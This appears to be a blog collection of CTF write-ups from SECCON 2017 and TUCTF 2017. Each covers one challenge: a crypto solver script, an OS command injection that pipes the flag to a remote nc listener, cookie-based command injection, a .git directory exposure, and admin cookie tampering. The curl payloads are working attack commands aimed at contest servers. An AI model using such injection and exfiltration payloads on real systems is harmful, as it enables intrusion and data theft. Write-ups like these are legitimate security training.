Solution to SECCON 2017 Vigenere3d

10/12/17 — capitol

fractal

name:

Vigenere3d

category:

crypto

points:

100

Writeup

We got a python program:

import sys
def _l(idx, s):
    return s[idx:] + s[:idx]
def main(p, k1, k2):
    s = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz_{}"
    t = [[_l((i+j) % len(s), s) for j in range(len(s))] for i in range(len(s))]
    i1 = 0
    i2 = 0
    c = ""
    for a in p:
        c += t[s.find(a)][s.find(k1[i1])][s.find(k2[i2])]
        i1 = (i1 + 1) % len(k1)
        i2 = (i2 + 1) % len(k2)
    return c
print main(sys.argv[1], sys.argv[2], sys.argv[2][::-1])

and some example output:

$ python Vigenere3d.py SECCON{**************************} **************
POR4dnyTLHBfwbxAAZhe}}ocZR3Cxcftw9

Lets call the first argument “flag” and the second “seed”.

Line 2 in the main function creates a three dimensional lookup table, and as seen in the first line in the for loop, the lookups are based on flag string, the seed string and the seed string inversed.

Since we know 7 characters of the flag, we can calculate the key string like this:

    plain = "SECCON{"
    encry = "POR4dnyTLHBfwbxAAZhe}}ocZR3Cxcftw9"
    #print seed
    for a in range(0, 7):
        for d in range(0, len(t[s.find(plain[a])])):
            for e in range(0, len(t[s.find(plain[a])][s.find(plain[a])])):
                if t[s.find(plain[a])][d][e] == encry[a] and s[d] == 'A':
                    print "%i %c %c" % (a, s[d], s[e])

which gives us the output:

0 A _
1 A K
2 A P
3 A 2
4 A Z
5 A a
6 A _

Once we know that the seed is AAAAAAA_aZ2PK_ we can calculate the flag with:

    #print flag
    for a in range(0, len(p)):
        for d in range(0, len(s)):
            if t[d][s.find(k1[i1])][s.find(k2[i2])] == encry[a]:
                print "%i %c" % (a, s[d])

        i1 = (i1 + 1) % len(k1)
        i2 = (i2 + 1) % len(k2)

Flag was: SECCON{Welc0me_to_SECCON_CTF_2017}

Solution to TUCTF 2017 iFrame and Shame

03/12/17 — capitol

arachnid

name:

iFrame and Shame

category:

web

points:

300

Writeup

We where tired and just pointed arachni at the page and it reported that there was os command injection in the form.

Once we knew that it was just a question of getting the flag, there was some sort of limit on number of rows returned, so we just piped the flag to our server with nc.

curl 'http://iframeshame.tuctf.com/' --data 'search=" ; cat flag | nc <ip> <port> ; "&Submit=Submit+Query'

flag was TUCTF{D0nt_Th1nk_H4x0r$_C4nt_3sc4p3_Y0ur_Pr0t3ct10ns}

Solution to TUCTF 2017 Cookie Harrelson

02/12/17 — capitol

tallahassee

name:

Cookie Harrelson

category:

web

points:

200

Writeup

On accessing the webpage we got this cookie: tallahassee=Y2F0IGluZGV4LnR4dA%3D%3D

Decoding that with base64 revealed that it contained the string: cat index.txt

Playing around with the cookie showed that if we changed it the string “cat index.txt#” was prepended to the supplied value and sent back.

Based on that we guessed that the server generated the webpage by executing the content of the cookie. We just needed to break out of the comment pund character and we would be able to get the flag. First we did a ls to see that the filename of the flag was flag, and then we got the flag itself.

curl 'http://cookieharrelson.tuctf.com/' -H "Cookie: tallahassee=`echo -e '\ncat flag'|base64`"
curl 'http://cookieharrelson.tuctf.com/' -H "Cookie: tallahassee=`echo -e '\ncat flag'|base64`"

Flag was TUCTF{D0nt_3x3cut3_Fr0m_C00k13s}

Solution to TUCTF 2017 Git Gud

01/12/17 — capitol

eyes

name:

Git Gud

category:

web

points:

100

Writeup

Problem was a single web page with a Git Gud meme. A request to .git showed that the .git repository was included in the deployment. And after we had downloaded the repository it was easy to find the flag in the git reflog.

wget -drc http://gitgud.tuctf.com/.git/
git reflog
git show 08cd273

flag was: TUCTF{D0nt_Us3_G1t_0n_Web_S3rv3r}

Solution to TUCTF 2017 Cookie Duty

30/11/17 — capitol

cookies

name:

Cookie Duty

category:

web

points:

50

Writeup

We were presented with a page that had a simple form to set a name. The server set a cookie named not_admin to 1 when the form was posted.

To get the flag we simply changed the cookie value to 0 and requested the page again, like this:

curl 'http://cookieduty.tuctf.com/index.php' -H 'Host: cookieduty.tuctf.com' -H 'Cookie: not_admin=0; user=dGVzdA%3D%3D'

flag was TUCTF{D0nt_Sk1p_C00k13_Duty}